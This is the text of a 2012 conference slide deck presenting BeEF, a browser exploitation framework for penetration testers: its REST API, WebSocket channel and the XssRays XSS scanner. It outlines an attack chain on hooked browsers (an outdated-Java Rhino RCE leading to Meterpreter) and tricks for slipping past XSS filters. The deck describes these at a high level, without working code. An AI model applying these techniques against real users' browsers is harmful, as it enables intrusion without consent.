RESTful API, WebSockets, XssRays

Advances in BeEF

2012 - Athens - 4 May 2012

Michele “antisnatchor” Orru’

Saturday, May 5, 12

Who am I?

- Senior Security Consultant @ TW SpiderLabs - BeEF lead core developer- Application Security researcher- OpenBSD, Ruby and Javascript addict

- @antisnatchor- http://antisnatchor.com

Saturday, May 5, 12

What is BeEF?

Browser Exploitation Framework

Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse.

The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.

Saturday, May 5, 12

What is BeEF?

Saturday, May 5, 12

Outline

Saturday, May 5, 12

Outline

1. The need to be RESTful: the new APIII. The need to be speedy: WebSockets supportIII. I want more XSSs: XssRays enhancementsIV. demos and fun :D

Saturday, May 5, 12

The need to be RESTful

- I hate SOAP- I hate XML-RPC- I love to use protocol (HTTP) features without reinventing the wheel

Saturday, May 5, 12

The need to be RESTful

Ruby + Sinatra + JSON = WIN

get ‘/to/a/pub’“BeER please”

end

Saturday, May 5, 12

- programmatically control BeEF with whatever eats HTTP and JSON (bash + curl?)

- facilitate integration with third tools (ZAP?)

- create your own custom UI/GUI (mobile?)

The need to be RESTful

Saturday, May 5, 12

More info: - http://blog.beefproject.com/2012/03/restful-api-from-antisnatchor-with-love.html - http://blog.beefproject.com/2012/03/restful-api-demo.html

Read the doc, you lazy! - https://github.com/beefproject/beef/wiki/BeEF-RESTful-API

The need to be RESTful

Saturday, May 5, 12

Pwn hooked browsers with JDK <= 1.6.0_271. get hooked browsers type/version/OS/pluginsII. if browserIsIE

createOverlayIframe(Above) else launchManInTheBrowser endIII. if javaEnabled launchGetSystemInfoIV. if JDK <= 1.6.0_27 launchRhinoRCEV. enjoy Java meterpreter

The need to be RESTfulDemo time

Saturday, May 5, 12

BeEF communication channel uses XHR-polling

The need to be speedy: WS

Pros: - works everywhere (we support IE, Chrome, Safari, Firefox, Opera and mobile browsers)

Cons: - not efficient, data overhead

Saturday, May 5, 12

Meet WebSocket support in BeEF

XHR-polling

The need to be speedy: WS

Saturday, May 5, 12

Meet WebSocket support in BeEF

XHR-polling WebSockets

The need to be speedy: WS

Saturday, May 5, 12

The need to be speedy: WS

If beef.browser.hasWebSocket() don’t use XHR-polling, open a WebSocket channel

currently supported: Firefox, Chrome, Safarialso MozWebSocket (damn prefixes #$*(%$)

speaks hixie-75, hixie-76, hybi-07, hybi-10

Saturday, May 5, 12

still experimental in BeEF (bugfixing/testing phase)clone https://github.com/radoen/beef-radoen to give it a try

The need to be speedy: WS

opens a whole new range of possible features- real time VNC-like hooked browser control- faster Tunneling proxy (fuzzing through the hooked browser 4/5 times faster)- general faster communication

Saturday, May 5, 12

- launch 1000 return_long_string modules,both normal XHR-polling and WebSockets

The need to be speedy: WSdemo time

Saturday, May 5, 12

I want more XSSs: XssRays

Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner. Then integrated in BeEF.

XssRays basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path creating hidden iFrames.

Who uses FrameBusting/X-Frame-Options out there :-)?

Saturday, May 5, 12

I want more XSSs: XssRays

We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). Also means false-positive free.

Potential false-negatives as we blindly inject vectors.

Basically the document.location.href of the injected iFrame that contains the vector will point to a known BeEF resource.

Saturday, May 5, 12

I want more XSSs: XssRays

Saturday, May 5, 12

I want more XSSs: XssRays

It also works cross-domain (respecting the SOP)

Saturday, May 5, 12

I want more XSSs: XssRays

Enhancements from previous months: - added more attack vectors double URL encoded, double nibble, DOM based injections

- added Chrome/Safari support base64‘ing the iFrame src in order to bypass the XSS filter

- added IE6 to IE9 support did you know that in IE6 location.pathname doesn’t contains the first forward slash? (thanks Gareth)

Saturday, May 5, 12

Thanks

Thanks to my BeEFfy friends: Wade, Christian, Brendan, Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may have forgotten

Our new blogger Heather P.

SpiderLabs because I don’t have to take holidays to be here

Special thanks to Kyprianos and Chris

Saturday, May 5, 12

Thanks

(Please note: we’ll not pay you. You know we love OpenSource :-)

follow us: @beefprojectmain site: http://beefproject.comthe new blog: http://blog.beefproject.comgithub page: https://github.com/beefproject/beef

Saturday, May 5, 12

Questions?

Saturday, May 5, 12